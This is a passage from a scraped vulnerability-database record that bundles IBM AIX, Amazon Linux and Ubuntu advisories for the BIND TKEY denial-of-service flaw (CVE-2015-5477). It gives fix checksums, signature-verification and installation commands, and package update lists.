key_w_fix\n 6.1.8.6 IV75694s6a.150803.epkg.Z key_w_fix\n 6.1.9.5 IV75692s5a.150803.epkg.Z key_w_fix\n 7.1.2.6 IV75690s6a.150803.epkg.Z key_w_fix\n 7.1.3.5 IV75693s5a.150803.epkg.Z key_w_fix\n\n\n To extract the fixes from the tar file:\n\n tar xvf bind9_fix8.tar\n cd bind9_fix8\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n| 043af7d6494326d47b3d35a2a1b9785ea7df4b6d6e56282a251d52d5579d67a1 IV75966s9a.150813.epkg.Z key_w_csum\n af10c7895263c219514f1281617c082dbef35ec5076fa6744e3726517eb322dc IV75694s6a.150803.epkg.Z key_w_csum\n c8c76aed365993102386e9a01b825673fe5684e0b549ae72abf6f1fb9cd55fba IV75692s5a.150803.epkg.Z key_w_csum\n e574f9da379cb8eb8709cd7f87243cb44b75cc8462a02144973d4def4b7021c4 IV75690s6a.150803.epkg.Z key_w_csum\n ad3665e58be16caf9b21f75f788431181c3d79b057129bf4da05690c0bed9304 IV75693s5a.150803.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n You should verify applying this configuration change does not cause\n any compatibility issues. If you change the default setting after\n applying the fix, you will expose yourself to the attack described\n above. IBM recommends that you review your entire environment to\n identify other areas where you have enabled the Diffie-Hellman\n key-exchange protocol used in TLS and take appropriate mitigation and\n remediation actions.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2:\n http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n\n\nACKNOWLEDGEMENTS:\n\n None\n\n\nCHANGE HISTORY:\n\n First Issued: Thu Aug 13 10:35:36 CDT 2015\n| Updated: Mon Aug 17 09:11:49 CDT 2015\n| Update: Added AIX 5.3 vulnerability information\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. \n", "modified": "2015-08-17T09:11:49", "published": "2015-08-13T10:35:36", "id": "BIND9_ADVISORY8.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc", "title": "Vulnerability in BIND affects AIX,Vulnerability in BIND affects VIOS", "type": "aix", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2019-05-29T19:20:25", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nAs [reported upstream](<https://kb.isc.org/article/AA-01272/0>), an error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.\n\n \n**Affected Packages:** \n\n\nbind\n\n \n**Issue Correction:** \nRun _yum update bind_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n bind-libs-9.8.2-0.30.rc1.38.amzn1.i686 \n bind-chroot-9.8.2-0.30.rc1.38.amzn1.i686 \n bind-sdb-9.8.2-0.30.rc1.38.amzn1.i686 \n bind-utils-9.8.2-0.30.rc1.38.amzn1.i686 \n bind-devel-9.8.2-0.30.rc1.38.amzn1.i686 \n bind-9.8.2-0.30.rc1.38.amzn1.i686 \n bind-debuginfo-9.8.2-0.30.rc1.38.amzn1.i686 \n \n src: \n bind-9.8.2-0.30.rc1.38.amzn1.src \n \n x86_64: \n bind-sdb-9.8.2-0.30.rc1.38.amzn1.x86_64 \n bind-chroot-9.8.2-0.30.rc1.38.amzn1.x86_64 \n bind-libs-9.8.2-0.30.rc1.38.amzn1.x86_64 \n bind-utils-9.8.2-0.30.rc1.38.amzn1.x86_64 \n bind-9.8.2-0.30.rc1.38.amzn1.x86_64 \n bind-debuginfo-9.8.2-0.30.rc1.38.amzn1.x86_64 \n bind-devel-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \n \n", "modified": "2015-07-28T11:32:00", "published": "2015-07-28T11:32:00", "id": "ALAS-2015-573", "href": "https://alas.aws.amazon.com/ALAS-2015-573.html", "title": "Critical: bind", "type": "amazon", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:39:47", "bulletinFamily": "unix", "description": "Jonathan Foote discovered that Bind incorrectly handled certain TKEY \nqueries. A remote attacker could use this issue with a specially crafted \npacket to cause Bind to crash, resulting in a denial of service. \n(CVE-2015-5477)\n\nPories Ediansyah discovered that Bind incorrectly handled certain \nconfigurations involving DNS64. A remote attacker could use this issue with \na specially crafted query to cause Bind to crash, resulting in a denial of \nservice. This issue only affected Ubuntu 12.04 LTS. (CVE-2012-5689)", "modified": "2015-07-28T00:00:00", "published": "2015-07-28T00:00:00", "id": "USN-2693-1", "href": "https://ubuntu.com/security/notices/USN-2693-1", "title": "Bind vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}
